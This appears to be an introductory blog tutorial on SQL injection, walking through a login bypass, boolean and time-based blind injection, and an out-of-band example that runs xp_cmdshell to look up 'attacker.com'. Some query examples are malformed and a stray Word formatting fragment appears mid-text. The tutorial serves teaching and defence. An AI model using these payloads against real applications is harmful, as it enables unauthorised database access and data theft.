SQL, or Structured Query Language, is an amazing and really powerful tool used for managing and manipulating data in databases. It lets the user retrieve, update, delete, and insert data. And it is efficient at it. Whether it is a small application or a large application SQL plays a very important role in handling data. It is simple and flexible making it a favourite among developers. However, with great power comes vulnerabilities, and one of the most common threats is SQL injection.
How SQL Injection Works
SQL injection is a hacking technique that takes advantage of the weakness or loopholes in an application's database query system. Attackers manipulate input fields, like login forms or search bars, by injecting malicious SQL code. This code tricks the database into executing unintended commands. For example, instead of just logging in, the attacker could gain unauthorized access to sensitive data or even delete entire tables. This happens because the application does not validate or sanitize user input, which serves as a gateway for hackers.
An Introduction to SQL Injection: A Basic Example
Suppose you have a login page where you insert a username and password. The SQL statement involved here might be like this:
SELECT FROM users WHERE username = 'input' AND password = 'input';
An attacker could fill in both boxes with ' OR '1'='1. The query will then turn out to be this:
SELECT FROM users WHERE username = '' OR '1'='1' AND password = '' OR '1'='1';
Since '1'='1' is always true, the database returns all users, giving the attacker access. Or the hacker would use this technique he will type in the correct username and for the password he uses the condition, username' or '1'='1'; --. Now the password part of the SQL code is commented out. Another way is using an error based SQL injection -SELECT * FROM users WHERE id = 1 AND extractvalue(1, 'XPath expression');
There are 3 types of SQL injections
In-band (Classic) SQL Injection
Inferential (Blind) SQL Injection
Out-of-band SQL Injection
Now let’s talk about Inferential (Blind) SQL Injection. Unlike in-band SQL injection, it doesn’t reveal data directly. Instead, attackers infer information by observing the database’s behavior. This is divided into two types:
Boolean-based Blind SQL Injection
Time-based Blind SQL Injection
Boolean-based Blind SQL Injection
This involves sending true/false queries and watching the application’s response.
Example:
Vulnerable Query:
SELECT title FROM products WHERE id = '1';
Injected Input:
The attacker enters 1' AND 1=1;--. This makes the query:
SELECT title FROM products WHERE id = '1' AND 1=1;--
Since 1=1 is true, the query works, and the application shows normal results.
Testing False Condition:
Next, the attacker inputs: 1' AND 1=2;--. The query becomes:
SELECT title FROM products WHERE id = '1' AND 1=2;--
Here, 1=2 is false, so the application returns nothing.
Time-based Blind SQL Injection
This one is sneaky. It makes the database server pause to confirm certain conditions.
Example:
Vulnerable Query:
SELECT title FROM products WHERE id = '1';
Injected Input:
The attacker could input: 1' AND IF(1=1, SLEEP(5), 0);-- for MySQL. The query becomes:
SELECT title FROM products WHERE id = '1' AND IF(1=1, SLEEP(5), 0);--
If the response is delayed by 5 seconds, the condition is true.
Testing False Condition:
To test a false condition, they input: 1' AND IF(1=2, SLEEP(5), 0);--. This won’t delay the response because 1=2 is false.[if gte vml 1]><v:rect id="_x0000_s1026" style='position:absolute;margin-left:0;margin-top:..; height:.1pt;z-index:251659264;mso-position-..; mso-position-horizontal-relative:text;mso-position-vertical-relative:text' o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"> <w:wrap type="square" side="right"/> </v:rect><![endif]
Finally, there’s Out-of-band SQL Injection.
This method uses external servers to get the data. It’s less common and needs special features on the database.
Example:
Vulnerable Query:
SELECT title FROM products WHERE id = '1';
Injected Input:
The attacker inputs: 1; EXEC xp_cmdshell('nslookup attacker.com');-- for Microsoft SQL Server. The query becomes:
SELECT title FROM products WHERE id = '1'; EXEC xp_cmdshell('nslookup attacker.com');--
This command makes the server send a DNS request to attacker.com, letting the attacker know the injection worked and revealing the server’s IP address.
Hope you learnt something new
Happy Coding…